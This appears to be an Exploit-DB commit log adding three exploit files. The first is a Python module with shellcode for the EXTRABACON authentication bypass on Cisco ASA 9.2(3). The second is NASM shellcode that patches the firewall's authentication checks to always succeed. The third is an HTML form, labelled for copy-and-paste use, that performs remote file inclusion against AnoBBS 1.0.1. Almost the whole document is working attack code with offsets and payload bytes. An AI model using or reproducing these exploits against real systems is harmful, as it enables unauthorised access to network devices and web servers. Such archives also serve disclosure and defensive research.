DB: 2016-09-17

3 new exploits

Too many to list!

platforms/hardware/remote/40386.py

@@ -0,0 +1,65 @@
+#
+# Cisco ASA 9.2(3) Authentication Bypass (EXTRABACON Module)
+#
+# Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
+# License: http://opensource.org/licenses/MIT
+# Release Date: September 15, 2016
+#
+# Authors:
+#           Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
+#           Zachary Harding (14C0AA3670E9501ADDFC0176298CD7A969BAA8A1)
+#
+# Description:
+#            Additional EXTRABACON module for Cisco ASA version 9.2(3).
+#            This does not use the same shellcode as the Equation Group version,
+#            but accomplishes the same task of disabling the auth functions
+#            in less stages/bytes.
+#
+# Build/Run:
+#            1) Save this file to versions/shellcode_asa923.py
+#            2) Add the version string to fw_version_check()
+#            3) Shellcode is for --pass-disable
+#
+
+vers = "asa923"
+
+# there is a jmp esp @ 08 1d 70 1d
+# 81d701c:	e8 ff e4 ff ff       	call   81d5520 <_ctm_hw_free@@Base+0x50fd0>
+my_ret_addr_len = 4
+my_ret_addr_byte = "\x1d\x70\x1d\x08"
+my_ret_addr_snmp = "29.112.29.8"
+
+finder_len = 9
+finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
+finder_snmp = "139.124.36.20.139.7.255.224.144"
+
+# ROPgadget --binary lina_92-3  --opcode 897dfc8b1685d2
+# 0x9b78010 = function
+# 0x9b78000 = byte boundary
+# 0x8085a40
+# 0x8085000
+# preamble has a stack clean up and offset to where we first hijacked execution
+# 0x9277386
+preamble_len = 69
+preamble_byte = "\x31\xc0\x31\xdb\x31\xf6\x31\xc9\x60\x80\xc5\x10\x80\xc2\x07\x04\x7d\x50\xbb\x00\x80\xb7\x09\xcd\x80\x58\xbb\x00\x50\x08\x08\xcd\x80\x68\x31\xc0\x40\xc3\x58\xa3\x10\x80\xb7\x09\xa3\x40\x5a\x08\x08\x61\x68\x86\x73\x27\x09\x80\xc3\x10\xbf\x0b\x0f\x0f\x0f\x89\xe5\x83\xc5\x48\xc3"
+preamble_snmp = "49.192.49.219.49.246.49.201.96.128.197.16.128.194.7.4.125.80.187.0.128.183.9.205.128.88.187.0.80.8.8.205.128.104.49.192.64.195.88.163.16.128.183.9.163.64.90.8.8.97.104.134.115.39.9.128.195.16.191.11.15.15.15.137.229.131.197.72.195"
+
+postscript_len = 2
+postscript_byte = "\x61\xc3"
+postscript_snmp = "97.195"
+
+launcher_len = 6
+launcher_snmp = "144.144.144.144.144.144"
+launcher_byte = "\x90\x90\x90\x90\x90\x90"
+
+payload_nop_len = 116
+payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x1d\x80\xbe\x09\x50\xb8\x05\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3"
+payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.29.128.190.9.80.184.5.96.163.173.53.165.165.165.165.255.208.88.195"
+
+payload_PMCHECK_DISABLE_len = 70
+payload_PMCHECK_DISABLE_byte = "\x7a\x30\x78\x30\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\x12\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\x80\xb7\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
+payload_PMCHECK_DISABLE_snmp = "122.48.120.48.191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.18.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.128.183.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"
+
+payload_AAAADMINAUTH_DISABLE_len = 66
+payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x40\x5a\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3"
+payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.90.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195"

platforms/hardware/shellcode/40387.nasm

@@ -0,0 +1,90 @@
+;
+; Cisco ASA Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes)
+;
+; Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
+; License: http://opensource.org/licenses/MIT
+; Release Date: September 15, 2016
+;
+; Author: Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
+;
+; Description:
+;            This is not the same shellcode as the Equation Group version,
+;            but accomplishes the same task of disabling the auth functions
+;            in less stages/bytes. Particularly, it is 69 bytes in one stage
+;            instead of 200+ bytes spread across 2 stages.
+;
+; Build/Run:
+;            1) $ nasm shelldisable.nasm
+;            2) copy resulting shellcode into preamble_byte/preamble_snmp vars
+;            3) Change launcher_snmp to 6 nops (or remove entirely)
+;
+; Note: The offsets given are for 9.2(3), not part of the original release
+;
+BITS 32
+
+SAFERET_OFFSET  equ     0x9277386       ; where to continue execution
+PMCHECK_BOUNDS  equ     0x9b78000       ; mprotect for pmcheck()
+PMCHECK_OFFSET  equ     0x9b78010       ; location of pmcheck()
+ADMAUTH_BOUNDS  equ     0x8085000       ; page align for admauth()
+ADMAUTH_OFFSET  equ     0x8085a40       ; location of admauth()
+
+; we must patch pmcheck() and admauth() to always return true
+; xor eax, eax  = 31 c0
+; inc eax       = 40
+; ret           = c3
+
+PATCH_CODE	equ	0xc340c031               ; gotta love endianess
+
+; we need to fix the function frame to continue normal operation
+; eax = 0x0
+; esi = 0x0
+; edi = 0x0b
+; ebx = 0x10
+; ebp = [esp - 0x4 (ret)] + 0x??
+FIX_EBP         equ     0x48            ; this is 0x58, etc. in some versions
+FIX_EDI         equ     0x0f0f0f0b      ; seems static?
+FIX_EBX         equ     0x10            ; seems static?
+
+_start:
+
+    ; these are registers we have to clean up, so we can null them before save
+    xor eax, eax
+    xor ebx, ebx
+    xor esi, esi
+    xor ecx, ecx                        ; ecx is volatile register
+
+    pusha                               ; save all registers
+
+    add ch, 0x10                        ; ecx = 0x1000
+    add dl, 0x7                         ; edx = 0x7
+    add al, 0x7d                        ; eax = 0x7d
+
+    push eax                            ; save eax for second call
+
+    mov ebx, PMCHECK_BOUNDS             ; ebx = byte boundary for mprotect
+
+    int 0x80                            ; sys_mprotect(PMCHECK_BOUNDS, 0x1000, 0x7)
+
+    pop eax                             ; eax = 0x7d
+    mov ebx, ADMAUTH_BOUNDS             ; second function page align
+
+    int 0x80                            ; sys_mprotect(ADMAUTH_BOUNDS, 0x1000, 0x7)
+
+    push PATCH_CODE
+    pop eax
+
+    mov dword [PMCHECK_OFFSET], eax     ; write patch code to both functions
+    mov dword [ADMAUTH_OFFSET], eax
+
+    popa                                ; restore all registers
+
+    push SAFERET_OFFSET                 ; push the safe return address
+
+    ; these registers are pre-xored
+    add bl, FIX_EBX
+    mov edi, FIX_EDI
+
+    mov ebp, esp
+    add ebp, FIX_EBP
+
+    ret                                 ; return to safe address

platforms/php/webapps/40388.html

@@ -0,0 +1,61 @@
+<!--
+# Title: AnoBBS 1.0.1 Remote File Inclusion Exploit
+# Author: bd0rk || Germany
+# Tested on: Ubuntu-Linux
+# Twitter: twitter.com/bd0rk
+# Greetz: Vadim, x0r_32, rgod, zone-h.org, Michael RaumklanG
+
+#Vendor-URL: http://www.iterapi.com/index.php?cat=78&art=788
+#Download-Link: http://www.hotscripts.com/listings/jump/download/90434
+
+#The $prog_dir-parameter in /anobbs_dev_1.0.1/progs/bbs_auth.php line 7 is vulnerable.
+
+>>>Exploitcode for Copy&Paste<<<
+-->
+
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>AnoBBS 1.0.1 Remote File Inclusion Exploit</title>
+<script language="JavaScript">
+ 
+var dir="/progs/"
+var file="/bbs_auth.php?"
+var parameter ="prog_dir="
+var shell="Insert your shellcode here"
+ 
+function command() {
+if (document.rfi.target1.value==""){
+alert("Exploit failed...");
+return false;
+}
+ 
+rfi.action= document.rfi.target1.value+dir+file+parameter+shell;
+rfi.submit();
+}
+</script>
+</head>
+ 
+<body bgcolor="#000000">
+<center>
+ 
+<p><b><font face="Verdana" size="2" color="#008000">AnoBBS 1.0.1 Remote File Inclusion Exploit</font></b></p>
+ 
+<p></p>
+<form method="post" target="getting" name="rfi" onSubmit="command();">
+    <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial">
+  </font><font color="#FF0000" size="2">&nbps;</font></b>
+  <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
+  <p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p>
+</form>
+<p><br>
+<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
+</p>
+ 
+<b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p>
+</center>
+</body>
+ 
+</html>
+
+